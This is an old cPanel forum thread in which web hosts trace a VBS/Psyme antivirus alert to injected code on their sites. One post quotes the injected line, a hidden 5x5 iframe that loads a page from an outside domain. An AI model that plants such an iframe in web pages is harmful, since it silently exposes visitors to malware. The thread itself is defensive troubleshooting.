Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

VBS/Psyme

Discussion in 'General Discussion' started by ramagea, Jul 13, 2006.

  1. ramagea

    ramagea Member

    Joined:
    Aug 10, 2004
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    151
    I am using Cpanel on a redhat system. Some people are complaining that when they visit my websites their virus checker comes up saying that it has detected VBS/Psyme virus. I dont get this my self and a few other people dont get it, but quite a few people are getting this on ALL of the websites on the web server.

    Does anyone know what I can do?:(
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,460
    Likes Received:
    22
    Trophy Points:
    463
    Location:
    Go on, have a guess
    Could be a symptom of a dynamically loaded PHP exploit module. Check in /usr/lib/php.ini and set:

    enable_dl = Off

    Then restart httpd and see if the problem goes away.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. Interdit

    Interdit Well-Known Member

    Joined:
    May 27, 2003
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    156
    Hello,

    Some of the visitors of my customer got a warning on the index page VBS/Psyme as well.

    Chirpy i did try your fix but it didn't help. Any other idea or fix ?

    Thanks,
    Francois
     
  4. Interdit

    Interdit Well-Known Member

    Joined:
    May 27, 2003
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    156
    Hello,

    I found that in an index.html:

    DONT CLICK ON IT, IT MIGHT INFECT YOUR PC

    <IFRAME name="StatPage" src="http://xuiputalo.com/user/index2.php" width=5 height=5 style="display:none"></IFRAME>

    That's the problem. But how did it come there, still looking after it.

    Best regards,
    Francois
     
  5. ttremain

    ttremain Well-Known Member

    Joined:
    Feb 16, 2003
    Messages:
    216
    Likes Received:
    0
    Trophy Points:
    166
    cPanel Access Level:
    Root Administrator
    Any ideas? I'm seeing the same thing added dynamicly to sites on one of our servers.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. PbG

    PbG Well-Known Member

    Joined:
    Mar 11, 2003
    Messages:
    246
    Likes Received:
    0
    Trophy Points:
    166
    I am seeing it as well on several sites spread across multiple servers & OS's. It keeps coming back even with "enable_dl off".
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice